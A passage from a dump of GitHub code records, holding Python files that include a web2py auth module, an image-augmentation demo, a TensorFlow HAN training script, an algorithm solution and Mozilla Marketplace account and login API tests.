(self.db.auth_users.auth_email == auth_email) &\\\n (self.db.auth_users.id == \\\n self.db.auth_user_role.auth_user_id) &\\\n (self.db.auth_user_role.auth_role_id == \\\n self.db.auth_roles.id)).select(\n self.db.auth_roles.auth_role_name)\n if user_roles:\n roles_found = [each_role for each_role in user_roles\n if each_role.auth_role_name in roles_to_check]\n if roles_found:\n hasrole = True\n return hasrole\n\n def get_roles(self):\n \"\"\" Returns a list of roles the user belongs to \"\"\"\n roles = []\n if self.is_auth():\n auth_email = self.get_user_name()\n user_roles = self.db(\n (self.db.auth_users.auth_email == auth_email) &\\\n (self.db.auth_users.id == \\\n self.db.auth_user_role.auth_user_id) &\\\n (self.db.auth_user_role.auth_role_id == \\\n self.db.auth_roles.id)).select(\n self.db.auth_roles.auth_role_name)\n if user_roles:\n roles = [each_role.auth_role_name for each_role in user_roles]\n return roles\n\n def get_user_id(self):\n \"\"\" Returns the ID (Numeric) for the authentcated user, or None (NULL)\n if the user is not authenticated in the system\n\n \"\"\"\n return self.session.user_id\n\n def get_user_name(self):\n \"\"\" same as __call__ - returns the 'username' (email) \"\"\"\n return self.session.auth_email or self._anonymous_user\n\n def get_user_email(self):\n \"\"\" Deprecated - for compatibility only, use get_user_name()\n instead\n\n \"\"\"\n return self.get_user_name()\n\n def is_auth(self):\n \"\"\" True if the user has been authenticated in the system,\n false otherwise\n\n \"\"\"\n return True if self.session.user_id is not None else False\n\n def is_admin(self):\n \"\"\" This is a hack-y method (or shortcut) that can become useful in\n the future if the developer decides that \"zAdministrator\" should\n not be the only \"admin\" in the system\n\n \"\"\"\n return self.has_role('zAdministrator')\n\n def requires_login(self):\n \"\"\" Decorator Helper to aid in determine whether a controller needs\n specific access\n\n \"\"\"\n def wrapper(func):\n\n def f(*args, **kwargs):\n if not self.is_auth():\n return redirect(URL(r=self.request, c='default',\n f='login'))\n return func(*args, **kwargs)\n\n return f\n\n return wrapper\n\n def requires_role(self, roles):\n \"\"\" Decorator Helper to aid in determine whether a controller needs\n specific access\n\n \"\"\"\n def wrapper(func):\n\n def f(*args, **kwargs):\n if not self.has_role(roles):\n return redirect(URL(r=self.request, c='default',\n f='login'))\n return func(*args, **kwargs)\n\n return f\n\n return wrapper\n","repo_name":"mdipierro/web2py-appliances","sub_path":"PyForum2/modules/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":9249,"program_lang":"python","lang":"en","doc_type":"code","stars":208,"dataset":"github-code","pt":"3"} +{"seq_id":"21253617939","text":"import os,json\nfrom tkinter import filedialog\nimport tkinter as tkM\n\ndef ShowFileInEnding(path, end):\n\t\"\"\"\n\tInput: path: path to specific folder, end: end of wanter to be all file (example: end=\".jpg\" )\n\tProcessing: create a filder fild with all file in specific end, show it, and that revers it all back.\n\t\"\"\"\n\tif os.path.exists(path) and os.path.isdir(path):\n\t\tarr = os.listdir(path)\n\t\tdirectory = path + \"\\\\JJFolder\"\n\t\tos.makedirs(directory)\n\t\tfor i in range(0, len(arr), 1):\n\t\t\tos.rename(path + \"\\\\\" + arr[i], directory + \"\\\\\" + arr[i] + \"_\" + str(i) + end)\n\t\troot = tkM.Tk()\n\t\troot.filename = filedialog.askopenfilename(initialdir=directory, title=\"JJ-ShowFileInEnding\",\n\t\t\t\t\t\t\t\t\t\t\t\t filetypes=((\"all files\", \"*.*\"), (\"all files\", \"*.*\")))\n\t\tfor i in range(0, len(arr), 1):\n\t\t\tos.rename(directory + \"\\\\\" + arr[i] + \"_\" + str(i) + end, path + \"\\\\\" + arr[i])\n\t\tos.removedirs(directory)\n\t\troot.destroy()\n\telse:\n\t\tprint(\"path: %s\\nDose not exist or is not a valid folder name.\" % path)\n\ndef openAssets():\n\tdata_path = os.path.join(os.path.dirname(os.path.abspath( __file__ )),\"config.json\")\n\twith open(data_path) as f:\n\t\tdata = json.loads(f.read())\n\t\tf.close()\n\tAssets_path = data[\"Assets\"]\n\tThemes_path = data[\"Themes\"]\n\tos.startfile(Themes_path)\n\tShowFileInEnding(Assets_path, \".jpg\")\n\nif __name__ == '__main__':\n\topenAssets()\n","repo_name":"yehonathanJacob/yjacob","sub_path":"PythonLab/PersonalProjects/scripts/OpenAssets/open_assets.py","file_name":"open_assets.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"33133198702","text":"from PIL import Image\nfrom torchvision import transforms as tfs\nimport matplotlib.pyplot as plt\nimport numpy as np\nim = Image.open('./cat.png')\nprint('before scale, shape: {}'.format(im.size))\nnew_im = tfs.Resize((100, 200))(im)\nprint('after scale, shape: {}'.format(new_im.size))\nnew_im = np.array(new_im, dtype='float32') # 将其转换为一个矩阵\n# random_im2 = tfs.RandomCrop((150, 100))(im)\n# center_im = tfs.CenterCrop(100)(im)\n# h_filp = tfs.RandomHorizontalFlip()(im)\n# v_flip = tfs.RandomVerticalFlip()(im)\n# rot_im = tfs.RandomRotation(45)(im)\n# bright_im = tfs.ColorJitter(brightness=1)(im) # 0 - 2\n# bright_im = np.array(bright_im, dtype='float32') # 将其转换为一个矩阵\n# contrast_im = tfs.ColorJitter(contrast=1)(im) # 0-2\n# color_im = tfs.ColorJitter(hue=0.5)(im) # color -0.5 - 0.5\nim_aug = tfs.Compose([\n tfs.Resize(120),\n tfs.RandomHorizontalFlip(),\n tfs.RandomCrop(96),\n tfs.ColorJitter(brightness=0.5, contrast=0.5, hue=0.5)\n])\nnrows = 3\nncols = 3\nfigsize = (8, 8)\n_, figs = plt.subplots(nrows, ncols, figsize=figsize)\nfor i in range(nrows):\n for j in range(ncols):\n figs[i][j].imshow(im_aug(im))\n figs[i][j].axes.get_xaxis().set_visible(False)\n figs[i][j].axes.get_yaxis().set_visible(False)\nplt.show()\n# 数据增强提高了模型应对于更多的不同数据集的泛化能力\n\n# plt.imshow(bright_im.astype('uint8'))\n# plt.show()","repo_name":"KruskalLin/PytorchLearning","sub_path":"cnn/augumentation.py","file_name":"augumentation.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24360333988","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport time\r\nimport os\r\nimport pickle\r\nfrom utils import prjPaths,get_logger\r\nfrom HAN_model_1 import HAN\r\nfrom dataProcessing import IMDB\r\n\r\nCONFIG = {\r\n 'dataset':'imdb',\r\n 'run_type':'train',\r\n 'embedding_dim':300,\r\n 'batch_size':256,\r\n 'num_epochs':25,\r\n 'evaluate_every':100,\r\n 'log_summaries_every':30,\r\n 'checkpoint_every':100,\r\n 'num_checkpoint':5,\r\n 'max_grad_norm':5.,\r\n 'dropout_keep_proba':0.5,\r\n 'learning_rate':1e-3,\r\n 'per_process_gpu_memory_fraction':0.9\r\n}\r\n\r\ndef train():\r\n paths = prjPaths()\r\n\r\n with open(os.path.join(paths.LIB_DIR,CONFIG['dataset'],'persisted_vars.p'),'rb') as handle:\r\n persisted_vars = pickle.load(handle)\r\n\r\n persisted_vars['embedding_dim'] = CONFIG['embedding_dim']\r\n persisted_vars['max_grad_norm'] = CONFIG['max_grad_norm']\r\n persisted_vars['dropout_keep_proba'] = CONFIG['dropout_keep_proba']\r\n persisted_vars['learning_rate'] = CONFIG['learning_rate']\r\n pickle._dump(persisted_vars,open(os.path.join(paths.LIB_DIR,CONFIG['dataset'],'persisted_vars.p'),'wb'))\r\n\r\n with tf.Graph().as_default():\r\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=CONFIG['per_process_gpu_memory_fraction'])\r\n session_conf = tf.ConfigProto(allow_soft_placement=True,\r\n log_device_placement=False,\r\n gpu_options=gpu_options)\r\n\r\n session_conf.gpu_options.allocator = 'BFC'\r\n\r\n with tf.Session(config=session_conf) as sess:\r\n han = HAN(max_seq_len=persisted_vars['max_grad_norm'],\r\n max_sent_len=persisted_vars['max_sent_len'],\r\n num_classes=persisted_vars['num_classes'],\r\n vocab_size=persisted_vars['vocab_size'],\r\n embedding_size=persisted_vars['embedding_dim'],\r\n max_grad_norm=persisted_vars['max_grad_norm'],\r\n dropout_keep_proba=persisted_vars['dropout_keep_proba'],\r\n learning_rate=persisted_vars['learning_rate']\r\n )\r\n\r\n global_step = tf.Variable(0,name='global_step',trainable=False)\r\n\r\n # 梯度裁剪需要获取训练参数\r\n tvars = tf.trainable_variables()\r\n grads, global_norm = tf.clip_by_global_norm(tf.gradients(han.loss,tvars),\r\n han.max_grad_norm)\r\n\r\n optimizer = tf.train.AdamOptimizer(han.learning_rate) # todo 尝试其他参数\r\n\r\n train_op = optimizer.apply_gradients(zip(grads,tvars),\r\n name='train_op',\r\n global_step=global_step)\r\n\r\n merge_summary_op = tf.summary.merge_all()\r\n train_summary_writer = tf.summary.FileWriter(os.path.join(paths.SUMMARY_DIR,CONFIG['run_type']),sess.graph)\r\n\r\n # todo 这里的保存对象换成sess\r\n saver = tf.train.Saver(tf.global_variables(),max_to_keep=CONFIG['num_checkpoint'])\r\n\r\n sess.run(tf.global_variables_initializer())\r\n\r\n # _________train__________\r\n def train_step(epoch,x_batch,y_batch,docsize,sent_size,is_training):\r\n tic = time.time()\r\n\r\n feed_dict = {han.input_x:x_batch,\r\n han.input_y:y_batch,\r\n han.sentence_lengths:docsize,\r\n han.word_legths:sent_size,\r\n han.sis_training:is_training}\r\n _, step, loss, accuracy, summaries = sess.run([train_op,global_step,han.loss,han.accuracy,merge_summary_op],feed_dict=feed_dict)\r\n\r\n time_elapsed = time.time() - tic\r\n\r\n if is_training:\r\n print('Training||CurrentEpoch: {} || GlobalStep: {} || ({} sec/sep) || Loss {:g}) || Accuracy {:g}'.format(epoch + 1, step, time_elapsed, loss, accuracy))\r\n\r\n if step % CONFIG['log_summaries_every'] == 0:\r\n train_summary_writer.add_summary(summaries,step)\r\n print(f'Saved model summaries to {os.path.join(paths.SUMMARY_DIR,CONFIG[\"run_type\"])} \\n')\r\n\r\n if step % CONFIG['checkpoint_every'] == 0:\r\n chkpt_path = saver.save(sess,os.path.join(paths.CHECKPOINT_DIR,'han'),\r\n global_step=step)\r\n print('Saved model checkpoint to {} \\n'.format(chkpt_path))\r\n\r\n imdb = IMDB(action='fetch')\r\n x_train, y_train, docsize_train, sent_size_train = imdb.get_data(type=CONFIG['run_type'])\r\n\r\n for epoch, batch in imdb.get_batch(data=list(zip(x_train,y_train,docsize_train,sent_size_train)),\r\n batch_size=CONFIG['batch_size'],\r\n num_epoch=CONFIG['num_epochs']):\r\n x_batch, y_batch, docsize, sent_size = zip(*batch)\r\n\r\n train_step(epoch=epoch,\r\n x_batch=x_batch,\r\n y_batch=y_batch,\r\n docsize=docsize,\r\n sent_size=sent_size,\r\n is_training=True)","repo_name":"LiaoBoWen/MyProject","sub_path":"Leaning/Model-studying/9_HAN/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"32511985","text":"# 이전 수열\n\nn = int(input())\ndata = list(map(int, input().split()))\n\nlength = len(data)\nk = -1\nfor i in range(length-1):\n # data[i] > data[i+1]을 만족하는 수 중 가장 큰 인덱스\n if data[i] > data[i+1]:\n k = i\n \nif k == -1:\n print(-1)\nelse:\n for j in range(k+1, length):\n # data[k] > data[j]를 만족하는 가장 큰 인덱스 \n if data[k] > data[j]:\n m = j\n\n data[k], data[m] = data[m], data[k]\n\n temp = data[k+1:]\n # 역순으로 정렬하기\n temp.sort(reverse=True)\n answer = data[:k+1] + temp\n\n for i in answer:\n print(i, end = ' ')","repo_name":"limgeonho/Algorithm-1","sub_path":"BOJ/Brute-Force/[BOJ]10973.py","file_name":"[BOJ]10973.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17480519105","text":"# -*- coding: utf-8 -*-\nimport collections\nimport json\nimport uuid\nfrom datetime import datetime\nfrom urlparse import urlparse\n\nfrom django.conf import settings\nfrom django.core import mail\nfrom django.core.urlresolvers import reverse\nfrom django.http import QueryDict\nfrom django.utils.http import urlencode\n\nfrom jingo.helpers import urlparams\nfrom mock import patch, Mock\nfrom nose.tools import eq_, ok_\n\nimport mkt\nfrom mkt.account.views import MineMixin\nfrom mkt.access.models import Group, GroupUser\nfrom mkt.api.tests.test_oauth import RestOAuth\nfrom mkt.constants.apps import INSTALL_TYPE_REVIEWER\nfrom mkt.site.fixtures import fixture\nfrom mkt.site.tests import TestCase\nfrom mkt.site.utils import app_factory\nfrom mkt.webapps.models import Installed, Webapp\nfrom mkt.users.models import UserProfile\n\n\nclass TestPotatoCaptcha(object):\n\n def _test_bad_api_potato_data(self, response, data=None):\n if not data:\n data = json.loads(response.content)\n eq_(400, response.status_code)\n ok_('non_field_errors' in data)\n eq_(data['non_field_errors'], [u'Form could not be submitted.'])\n\n\nclass FakeResourceBase(object):\n pass\n\n\nclass FakeResource(MineMixin, FakeResourceBase):\n def __init__(self, pk, request):\n self.kwargs = {'pk': pk}\n self.request = request\n\n\nclass TestMine(TestCase):\n fixtures = fixture('user_2519')\n\n def setUp(self):\n self.request = Mock()\n self.request.user = UserProfile.objects.get(id=2519)\n\n @patch.object(FakeResourceBase, 'get_object', create=True)\n def test_get_object(self, mocked_get_object):\n r = FakeResource(999, self.request)\n r.get_object()\n eq_(r.kwargs['pk'], 999)\n\n r = FakeResource('mine', self.request)\n r.get_object()\n eq_(r.kwargs['pk'], 2519)\n\n\nclass TestPermission(RestOAuth):\n fixtures = fixture('user_2519', 'user_10482')\n\n def setUp(self):\n super(TestPermission, self).setUp()\n self.get_url = reverse('account-permissions', kwargs={'pk': 2519})\n self.user = UserProfile.objects.get(pk=2519)\n\n def test_has_cors(self):\n self.assertCORS(self.client.get(self.get_url), 'get')\n\n def test_verbs(self):\n self._allowed_verbs(self.get_url, ('get'))\n\n def test_other(self):\n self.get_url = reverse('account-permissions', kwargs={'pk': 10482})\n eq_(self.client.get(self.get_url).status_code, 403)\n\n def test_no_permissions(self):\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200, res.content)\n self.assertSetEqual(\n ['admin', 'developer', 'localizer', 'lookup', 'curator',\n 'reviewer', 'webpay', 'website_submitter', 'stats',\n 'revenue_stats', 'content_tools_addon_review'],\n res.json['permissions'].keys()\n )\n ok_(not all(res.json['permissions'].values()))\n\n def test_some_permission(self):\n self.grant_permission(self.user, 'Localizers:%')\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(res.json['permissions']['localizer'])\n\n def test_mine(self):\n self.get_url = reverse('account-permissions', kwargs={'pk': 'mine'})\n self.test_some_permission()\n\n def test_mine_anon(self):\n self.get_url = reverse('account-permissions', kwargs={'pk': 'mine'})\n res = self.anon.get(self.get_url)\n eq_(res.status_code, 403)\n\n def test_publisher(self):\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(not res.json['permissions']['curator'])\n\n def test_publisher_ok(self):\n self.grant_permission(self.user, 'Collections:Curate')\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(res.json['permissions']['curator'])\n\n def test_feed_publisher_ok(self):\n self.grant_permission(self.user, 'Feed:Curate')\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(res.json['permissions']['curator'])\n\n def test_webpay(self):\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(not res.json['permissions']['webpay'])\n\n def test_webpay_ok(self):\n self.grant_permission(self.user, 'ProductIcon:Create')\n self.grant_permission(self.user, 'Transaction:NotifyFailure')\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(res.json['permissions']['webpay'])\n\n def test_website_submitter(self):\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(not res.json['permissions']['website_submitter'])\n\n def test_website_submitter_ok(self):\n self.grant_permission(self.user, 'Websites:Submit')\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(res.json['permissions']['website_submitter'])\n\n def test_stats(self):\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(not res.json['permissions']['stats'])\n\n def test_stats_ok(self):\n self.grant_permission(self.user, 'Stats:View')\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(res.json['permissions']['stats'])\n\n def test_revenue_stats(self):\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(not res.json['permissions']['revenue_stats'])\n\n def test_revenue_stats_ok(self):\n self.grant_permission(self.user, 'RevenueStats:View')\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(res.json['permissions']['revenue_stats'])\n\n\nclass TestAccount(RestOAuth):\n fixtures = fixture('user_2519', 'user_10482', 'webapp_337141')\n\n def setUp(self):\n super(TestAccount, self).setUp()\n self.url = reverse('account-settings', kwargs={'pk': 2519})\n self.user = UserProfile.objects.get(pk=2519)\n\n def test_has_cors(self):\n self.assertCORS(self.client.get(self.url), 'get', 'patch', 'put')\n\n def test_verbs(self):\n self._allowed_verbs(self.url, ('get', 'patch', 'put'))\n\n def test_not_allowed(self):\n eq_(self.anon.get(self.url).status_code, 403)\n\n def test_allowed(self):\n res = self.client.get(self.url)\n eq_(res.status_code, 200, res.content)\n data = json.loads(res.content)\n eq_(data['display_name'], self.user.display_name)\n\n def test_other(self):\n url = reverse('account-settings', kwargs={'pk': 10482})\n eq_(self.client.get(url).status_code, 403)\n\n def test_own(self):\n url = reverse('account-settings', kwargs={'pk': 'mine'})\n res = self.client.get(url)\n eq_(res.status_code, 200)\n data = json.loads(res.content)\n eq_(data['display_name'], self.user.display_name)\n\n def test_own_empty_name(self):\n self.user.update(display_name='')\n url = reverse('account-settings', kwargs={'pk': 'mine'})\n res = self.client.get(url)\n eq_(res.status_code, 200)\n data = json.loads(res.content)\n eq_(data['display_name'], 'user-2519')\n\n def test_patch(self):\n res = self.client.patch(\n self.url, data=json.dumps({'display_name': 'foo',\n 'enable_recommendations': '0',\n 'fxa_uid': 'f' * 32}))\n eq_(res.status_code, 200)\n user = UserProfile.objects.get(pk=self.user.pk)\n eq_(user.display_name, 'foo')\n eq_(user.enable_recommendations, False)\n eq_(user.fxa_uid, None)\n\n def test_patch_empty(self):\n res = self.client.patch(self.url,\n data=json.dumps({'display_name': None}))\n eq_(res.status_code, 400)\n data = json.loads(res.content)\n eq_(data['display_name'], [u'This field may not be null.'])\n\n res = self.client.patch(self.url,\n data=json.dumps({'display_name': ''}))\n eq_(res.status_code, 400)\n data = json.loads(res.content)\n eq_(data['display_name'], [u'This field may not be blank.'])\n\n def test_put(self):\n res = self.client.put(\n self.url, data=json.dumps({'display_name': 'foo',\n 'enable_recommendations': '0',\n 'fxa_uid': 'f' * 32}))\n eq_(res.status_code, 200)\n user = UserProfile.objects.get(pk=self.user.pk)\n eq_(user.display_name, 'foo')\n eq_(user.enable_recommendations, False)\n eq_(user.fxa_uid, None)\n\n def test_patch_extra_fields(self):\n res = self.client.patch(self.url,\n data=json.dumps({'display_name': 'foo',\n 'fxa_uid': 'f' * 32}))\n eq_(res.status_code, 200)\n user = UserProfile.objects.get(pk=self.user.pk)\n eq_(user.display_name, 'foo') # Got changed successfully.\n eq_(user.fxa_uid, None)\n\n def test_patch_other(self):\n url = reverse('account-settings', kwargs={'pk': 10482})\n res = self.client.patch(url, data=json.dumps({'display_name': 'foo'}))\n eq_(res.status_code, 403)\n\n\nclass TestInstalled(RestOAuth):\n fixtures = fixture('user_2519', 'user_10482', 'webapp_337141')\n\n def setUp(self):\n super(TestInstalled, self).setUp()\n self.list_url = reverse('installed-apps')\n self.remove_app_url = reverse('installed-apps-remove')\n self.user = UserProfile.objects.get(pk=2519)\n\n def test_has_cors(self):\n self.assertCORS(self.client.post(self.remove_app_url), 'post')\n self.assertCORS(self.client.options(self.list_url), 'get')\n\n def test_verbs(self):\n self._allowed_verbs(self.list_url, ('get'))\n self._allowed_verbs(self.remove_app_url, ('post'))\n\n def test_not_allowed(self):\n eq_(self.anon.get(self.list_url).status_code, 403)\n\n def test_installed(self):\n ins = Installed.objects.create(user=self.user, addon_id=337141)\n res = self.client.get(self.list_url)\n eq_(res.status_code, 200, res.content)\n data = json.loads(res.content)\n eq_(data['meta']['total_count'], 1)\n eq_(data['objects'][0]['id'], ins.addon.pk)\n eq_(data['objects'][0]['user'],\n {'developed': False, 'purchased': False, 'installed': True})\n\n def test_installed_pagination(self):\n ins1 = Installed.objects.create(user=self.user, addon=app_factory())\n ins1.update(created=self.days_ago(1))\n ins2 = Installed.objects.create(user=self.user, addon=app_factory())\n ins2.update(created=self.days_ago(2))\n ins3 = Installed.objects.create(user=self.user, addon=app_factory())\n ins3.update(created=self.days_ago(3))\n res = self.client.get(self.list_url, {'limit': 2})\n eq_(res.status_code, 200)\n data = json.loads(res.content)\n\n eq_(len(data['objects']), 2)\n eq_(data['objects'][0]['id'], ins1.addon.id)\n eq_(data['objects'][1]['id'], ins2.addon.id)\n eq_(data['meta']['total_count'], 3)\n eq_(data['meta']['limit'], 2)\n eq_(data['meta']['previous'], None)\n eq_(data['meta']['offset'], 0)\n next = urlparse(data['meta']['next'])\n eq_(next.path, self.list_url)\n eq_(QueryDict(next.query).dict(), {u'limit': u'2', u'offset': u'2'})\n\n res = self.client.get(self.list_url, {'limit': 2, 'offset': 2})\n eq_(res.status_code, 200)\n data = json.loads(res.content)\n\n eq_(len(data['objects']), 1)\n eq_(data['objects'][0]['id'], ins3.addon.id)\n eq_(data['meta']['total_count'], 3)\n eq_(data['meta']['limit'], 2)\n prev = urlparse(data['meta']['previous'])\n eq_(next.path, self.list_url)\n eq_(QueryDict(prev.query).dict(), {u'limit': u'2'})\n eq_(data['meta']['offset'], 2)\n eq_(data['meta']['next'], None)\n\n def test_installed_order(self):\n # Should be reverse chronological order.\n ins1 = Installed.objects.create(user=self.user, addon=app_factory())\n ins1.update(created=self.days_ago(1))\n ins2 = Installed.objects.create(user=self.user, addon=app_factory())\n ins2.update(created=self.days_ago(2))\n res = self.client.get(self.list_url)\n eq_(res.status_code, 200)\n data = json.loads(res.content)\n eq_(len(data['objects']), 2)\n eq_(data['objects'][0]['id'], ins1.addon.id)\n eq_(data['objects'][1]['id'], ins2.addon.id)\n\n def not_there(self):\n res = self.client.get(self.list_url)\n eq_(res.status_code, 200, res.content)\n data = json.loads(res.content)\n eq_(data['meta']['total_count'], 0)\n\n def test_installed_other(self):\n Installed.objects.create(user_id=10482, addon_id=337141)\n self.not_there()\n\n def test_installed_reviewer(self):\n Installed.objects.create(user=self.user, addon_id=337141,\n install_type=INSTALL_TYPE_REVIEWER)\n self.not_there()\n\n def test_installed_remove_app_anonymous(self):\n eq_(self.anon.get(self.remove_app_url).status_code, 403)\n eq_(self.anon.post(self.remove_app_url, {'app': 42}).status_code, 403)\n\n def test_installed_remove_app_not_installed(self):\n data = {'app': 4242}\n res = self.client.post(self.remove_app_url, json.dumps(data))\n eq_(res.status_code, 400)\n\n data = {}\n res = self.client.post(self.remove_app_url, json.dumps(data))\n eq_(res.status_code, 400)\n\n def test_installed_remove_app_get(self):\n eq_(self.client.get(self.remove_app_url).status_code, 405)\n\n def test_installed_remove_app(self):\n Installed.objects.create(user=self.user, addon_id=337141)\n app = app_factory()\n Installed.objects.create(user=self.user, addon=app)\n data = {'app': app.pk}\n res = self.client.post(self.remove_app_url, json.dumps(data))\n eq_(res.status_code, 202)\n # Make sure there are still 2 apps, but we removed one from the\n # installed list...\n eq_(Webapp.objects.count(), 2)\n eq_(list(self.user.installed_set.values_list('addon_id', flat=True)),\n [337141])\n\n def test_installed_remove_app_not_user_installed(self):\n Installed.objects.create(user=self.user, addon_id=337141)\n app = app_factory()\n Installed.objects.create(user=self.user, addon=app,\n install_type=INSTALL_TYPE_REVIEWER)\n data = {'app': app.pk}\n res = self.client.post(self.remove_app_url, json.dumps(data))\n eq_(res.status_code, 400)\n\n\nclass FakeUUID(object):\n hex = '000000'\n\n\n@patch.object(settings, 'SECRET_KEY', 'gubbish')\nclass TestLoginHandler(TestCase):\n\n def setUp(self):\n super(TestLoginHandler, self).setUp()\n self.url = reverse('account-login')\n self.logout_url = reverse('account-logout')\n\n def post(self, data):\n return self.client.post(self.url, json.dumps(data),\n content_type='application/json')\n\n @patch.object(uuid, 'uuid4', FakeUUID)\n @patch('requests.post')\n def _test_login(self, http_request):\n FakeResponse = collections.namedtuple('FakeResponse',\n 'status_code json')\n http_request.return_value = FakeResponse(\n 200, lambda: {'status': 'okay', 'email': 'cvan@mozilla.com'})\n res = self.post({'assertion': 'fake-assertion',\n 'audience': 'fakemkt.org'})\n eq_(res.status_code, 201)\n data = json.loads(res.content)\n eq_(data['token'],\n 'cvan@mozilla.com,95c9063d9f249aacfe5697fc83192ed6480c01463e2a80b3'\n '5af5ecaef11754700f4be33818d0e83a0cfc2cab365d60ba53b3c2b9f8f6589d1'\n 'c43e9bbb876eef0,000000')\n\n return data\n\n def test_login_new_user_success(self):\n data = self._test_login()\n ok_(not any(data['permissions'].values()))\n\n def test_login_existing_user_success(self):\n profile = UserProfile.objects.create(email='cvan@mozilla.com',\n display_name='seavan')\n self.grant_permission(profile, 'Apps:Review')\n\n data = self._test_login()\n eq_(data['settings']['display_name'], 'seavan')\n eq_(data['settings']['email'], 'cvan@mozilla.com')\n eq_(data['settings']['enable_recommendations'], True)\n eq_(data['permissions'],\n {'admin': False,\n 'developer': False,\n 'localizer': False,\n 'lookup': False,\n 'curator': False,\n 'reviewer': True,\n 'webpay': False,\n 'website_submitter': False,\n 'stats': False,\n 'revenue_stats': False,\n 'content_tools_addon_review': False})\n eq_(data['apps']['installed'], [])\n eq_(data['apps']['purchased'], [])\n eq_(data['apps']['developed'], [])\n\n @patch('mkt.users.models.UserProfile.purchase_ids')\n def test_relevant_apps(self, purchase_ids):\n profile = UserProfile.objects.create(email='cvan@mozilla.com')\n purchased_app = app_factory()\n purchase_ids.return_value = [purchased_app.pk]\n developed_app = app_factory()\n developed_app.addonuser_set.create(user=profile)\n installed_app = app_factory()\n installed_app.installed.create(user=profile)\n\n data = self._test_login()\n eq_(data['apps']['installed'], [installed_app.pk])\n eq_(data['apps']['purchased'], [purchased_app.pk])\n eq_(data['apps']['developed'], [developed_app.pk])\n\n @patch('requests.post')\n def test_login_failure(self, http_request):\n FakeResponse = collections.namedtuple('FakeResponse',\n 'status_code json')\n http_request.return_value = FakeResponse(\n 200, lambda: {'status': 'busted'})\n res = self.post({'assertion': 'fake-assertion',\n 'audience': 'fakemkt.org'})\n eq_(res.status_code, 403)\n\n def test_login_empty(self):\n res = self.post({})\n data = json.loads(res.content)\n eq_(res.status_code, 400)\n assert 'assertion' in data\n assert 'apps' not in data\n\n def test_logout(self):\n UserProfile.objects.create(email='cvan@mozilla.com')\n data = self._test_login()\n\n r = self.client.delete(\n urlparams(self.logout_url, _user=data['token']),\n content_type='application/json')\n eq_(r.status_code, 204)\n\n\n@patch.object(settings, 'SECRET_KEY', 'gubbish')\nclass TestFxaLoginHandler(TestCase):\n\n def setUp(self):\n super(TestFxaLoginHandler, self).setUp()\n self.url = reverse('fxa-account-login')\n self.logout_url = reverse('account-logout')\n\n def post(self, data):\n return self.client.post(self.url, json.dumps(data),\n content_type='application/json')\n\n @patch.object(uuid, 'uuid4', FakeUUID)\n @patch('requests.post')\n def _test_login(self, http_request, state='fake-state'):\n with patch('mkt.account.views.OAuth2Session') as get_session:\n m = get_session()\n m.fetch_token.return_value = {'access_token': 'fake'}\n m.post().json.return_value = {\n 'user': 'fake-uid',\n 'email': 'cvan@mozilla.com'\n }\n res = self.post({\n 'auth_response': 'https://testserver/?access_token=fake-token&'\n 'code=coed&state=' + state,\n 'state': state})\n eq_(res.status_code, 201)\n data = json.loads(res.content)\n eq_(data['token'],\n 'cvan@mozilla.com,95c9063d9f249aacfe5697fc83192ed6480c01463e2a'\n '80b35af5ecaef11754700f4be33818d0e83a0cfc2cab365d60ba53b3c2b9f'\n '8f6589d1c43e9bbb876eef0,000000')\n return data\n\n def test_login_new_user_success(self):\n eq_(UserProfile.objects.count(), 0)\n data = self._test_login()\n\n ok_(not any(data['permissions'].values()))\n profile = UserProfile.objects.get()\n eq_(profile.email, 'cvan@mozilla.com')\n eq_(profile.fxa_uid, 'fake-uid')\n\n def test_login_existing_user_uid_success(self):\n profile = UserProfile.objects.create(fxa_uid='fake-uid',\n email='old@mozilla.com',\n display_name='seavan')\n self.grant_permission(profile, 'Apps:Review')\n\n data = self._test_login()\n profile.reload()\n eq_(profile.source, mkt.LOGIN_SOURCE_FXA)\n eq_(data['settings']['display_name'], 'seavan')\n eq_(data['settings']['email'], 'cvan@mozilla.com')\n eq_(data['settings']['enable_recommendations'], True)\n eq_(data['permissions'],\n {'admin': False,\n 'developer': False,\n 'localizer': False,\n 'lookup': False,\n 'curator': False,\n 'reviewer': True,\n 'webpay': False,\n 'website_submitter': False,\n 'stats': False,\n 'revenue_stats': False,\n 'content_tools_addon_review': False})\n eq_(data['apps']['installed'], [])\n eq_(data['apps']['purchased'], [])\n eq_(data['apps']['developed'], [])\n\n # Ensure user profile got updated with email.\n eq_(profile.email, 'cvan@mozilla.com')\n\n # Ensure fxa_uid stayed the same.\n eq_(profile.fxa_uid, 'fake-uid')\n\n @patch('mkt.users.models.UserProfile.purchase_ids')\n def test_relevant_apps(self, purchase_ids):\n profile = UserProfile.objects.create(email='cvan@mozilla.com',\n fxa_uid='fake-uid')\n purchased_app = app_factory()\n purchase_ids.return_value = [purchased_app.pk]\n developed_app = app_factory()\n developed_app.addonuser_set.create(user=profile)\n installed_app = app_factory()\n installed_app.installed.create(user=profile)\n\n data = self._test_login()\n eq_(data['apps']['installed'], 